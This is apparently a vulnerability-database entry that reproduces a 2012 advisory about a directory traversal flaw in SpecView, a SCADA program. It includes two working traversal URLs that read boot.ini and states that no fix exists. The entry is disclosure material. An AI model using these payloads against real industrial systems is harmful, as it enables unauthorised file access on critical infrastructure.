ID

VAR-E-201206-1143

TITLE

SpecView 2.5 Build 853 Directory Traversal

DESCRIPTION

SpecView versions 2.5 build 853 and below suffer from a remote directory traversal vulnerability.

AFFECTED PRODUCTS

EXPLOIT

#######################################################################

Luigi Auriemma

Application: SpecView
http://www.specview.com
Versions: <= 2.5 build 853
Platforms: Windows
Bug: web server directory traversal
Exploitation: remote
Date: 29 Jun 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

SpecView is an easy to use SCADA software.

#######################################################################

======
2) Bug
======

The software has an option (disabled by default) that allows to run a
web server for providing an updated screenshot of the program.
This built-in web server is affected by a classical directory
traversal attack through the usage of more than two dots.

#######################################################################

===========
3) The Code
===========

http://SERVER/.../.../.../.../.../.../boot.ini
http://SERVER/...\...\...\...\...\...\boot.ini

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

EXPLOIT HASH

PRICE

free

TAGS

CREDITS

Luigi Auriemma

EXTERNAL IDS

SOURCES

LAST UPDATE DATE

2022-07-27T09:47:39.469000+00:00

SOURCES RELEASE DATE